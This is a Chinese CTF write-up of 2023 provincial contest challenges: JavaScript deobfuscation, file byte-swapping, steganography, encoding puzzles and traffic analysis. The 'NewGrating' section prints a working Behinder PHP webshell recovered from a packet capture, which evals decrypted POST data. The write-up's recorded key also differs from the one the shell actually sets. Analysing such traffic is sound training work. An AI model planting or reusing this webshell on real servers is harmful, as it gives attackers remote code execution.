2023省赛wp

初赛

number game

function _0x41b2() {
    var _0x581373 = ['random', '110weBJzg', '72Hfusyf', '3399gncQtP', 'fromCharCode', 'round', '57148oCRiuH', 'innerHTML', '565DHmrSB', '2543450CSzJEO', '295299TseKck', '40794iCQePa', '3062gGLIpQ', '9huxpnh', '30409884zfOaIf', 'toString', '15660bKtcCP'];
    _0x41b2 = function() {
        return _0x581373;
    }
    ;
    return _0x41b2();
}
(function(_0x6b2864, _0x325f4f) {
    var _0x19c61a = _0x359f
      , _0x596e22 = _0x6b2864();
    while (!![]) {
        try {
            var _0x410e5a = parseInt(_0x19c61a(0xd0)) / 0x1 * (-parseInt(_0x19c61a(0xd6)) / 0x2) + -parseInt(_0x19c61a(0xd1)) / 0x3 * (-parseInt(_0x19c61a(0xdb)) / 0x4) + parseInt(_0x19c61a(0xdd)) / 0x5 * (-parseInt(_0x19c61a(0xcf)) / 0x6) + -parseInt(_0x19c61a(0xde)) / 0x7 + -parseInt(_0x19c61a(0xd7)) / 0x8 * (parseInt(_0x19c61a(0xdf)) / 0x9) + -parseInt(_0x19c61a(0xd4)) / 0xa * (parseInt(_0x19c61a(0xd8)) / 0xb) + parseInt(_0x19c61a(0xd2)) / 0xc;
            if (_0x410e5a === _0x325f4f)
                break;
            else
                _0x596e22['push'](_0x596e22['shift']());
        } catch (_0x1b9b94) {
            _0x596e22['push'](_0x596e22['shift']());
        }
    }
}(_0x41b2, 0x79872));
function _0x359f(_0xa22008, _0x233420) {
    var _0x41b233 = _0x41b2();
    return _0x359f = function(_0x359fd1, _0xe2d6d7) {
        _0x359fd1 = _0x359fd1 - 0xcf;
        var _0x308121 = _0x41b233[_0x359fd1];
        return _0x308121;
    }
    ,
    _0x359f(_0xa22008, _0x233420);
}
function roll() {
    var _0x38f496 = _0x359f
      , _0x1afb7a = Math[_0x38f496(0xda)](Math[_0x38f496(0xd5)]() * 0x3e8);
    document['getElementById']('number')[_0x38f496(0xdc)] = _0x1afb7a[_0x38f496(0xd3)]();
    if (_0x1afb7a == 0x539) {
        var _0x14184c = [0x38, 0x6f, 0x1e, 0x24, 0x1, 0x32, 0x51, 0x45, 0x1, 0x3c, 0x24, 0xb, 0x55, 0x38, 0xa, 0x5d, 0x28, 0x12, 0x33, 0xb, 0x5d, 0x20, 0x1e, 0x46, 0x17, 0x3d, 0x10, 0x2a, 0x41, 0x44, 0x49, 0x1a, 0x31, 0x5a]
          , _0x477866 = '';
        for (var _0x6698b7 = 0x0; _0x6698b7 < _0x14184c['length']; _0x6698b7++)
            _0x477866 += String[_0x38f496(0xd9)](_0x14184c[_0x6698b7] ^ _0x6698b7 + 0x5a);
        alert(_0x477866);
    }
}

看到roll（）中_0x1afb7a == 0x539才能执行后续的alert

直接修改源代码

_0x1afb7a != 0x539

得到flag

b4By_m1$c_@n3_b4By_f3On7eNd_731cK!

Ez_misc

不知道文件格式

010查看

发现开头ffd8变成了ff8d，观察所有，发现每一位的两个字母都换了

脚本

with open('yuanshen','rb') as f:
    hex_list = ("{:02X}".format(int(c)) for c in f.read())   # 定义变量接受文件内容
    buflist = list(hex_list)  # 用列表保存信息，方便后续操作
    a=''
    for i in range(0,666294):
        buflist[i]=buflist[i][::-1]
    for i in range(0,666294):
        a = a+buflist[i]
with open("out.txt",'w')as f1:
    f1.write(a)

out.txt里面的内容复制到cyberchef

识别到jpg并导出

kali中

steghide info filename

有文件flag.txt

steghide extract -sf filename

得到flag.txt

DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT DASHDASHDOTDOTDOT DASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DASHDASHDASHDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOT

dot一眼是. 那么猜测DASH是-

替换得到

解密得到flag{df4f635ab342a5b3bb855a464d7bb4ec}

决赛

Xcode v5.8

给了flag.txt

hAXBCEaBZMLZNJbRAQnNlOZdARqFAB1QpKa7IF4F5R1ElBKErIKpFQZNcNEc+

根据题目Xcode V5.8，解xxencode ，得到：

23NBceayYVwLs6qjZLwdL475ZbTDdGt415d7QmQrVhe

然后base58

DASCTF{The_new_encode_master!!}

Ez_Signin

给了一个加密的压缩包

010打开发现报错

最后面附加了一串base64，解密内容What_iS_tHis_275626d657e6f556679666，发现是假的flag

爆破压缩包，密码是11452

base32解得一个鼠标键盘流量

只保留坐标，将坐标之间的,删去,例如这样495 313

gnuplot绘图

得到flag

需要镜像翻转

flag{8f16a9717824aa456eb9a98653eb3993}

比赛一直以为是W难受(

NewGrating

解压得到蝎.pcapng，猜测冰蝎

查看流量包翻到upload_file.php

------WebKitFormBoundary906dOBUcjOE26LmB
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php
@error_reporting(0);
session_start();
    // $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
    $key="e46023a69f8db309"; //DASCTF
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

------WebKitFormBoundary906dOBUcjOE26LmB
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundary906dOBUcjOE26LmB--

果然是冰蝎，记录一下key是e45e329feb5d925b

然后导出对象-html，一堆php，对里面的内容进行AES解密，再base64解密

得到password.png和flag.7z

赛后才知道是光栅

from PIL import Image
import numpy as np

img = np.array(Image.open('1.png'))
for i in range(5):
    z = np.zeros_like(img)
    z[:, i::5, :] = img[:, i::5, :]
    Image.fromarray(z).show()

运行脚本看了四张图片得到密码PPeRLR6SEmHGC

DASCTF{d68b6013-d70a-4ada-926d-68fe3265360a}